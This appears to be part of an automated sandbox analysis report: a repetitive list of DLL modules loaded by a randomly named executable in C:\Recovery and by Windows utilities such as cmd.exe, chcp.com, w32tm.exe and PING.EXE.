Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll
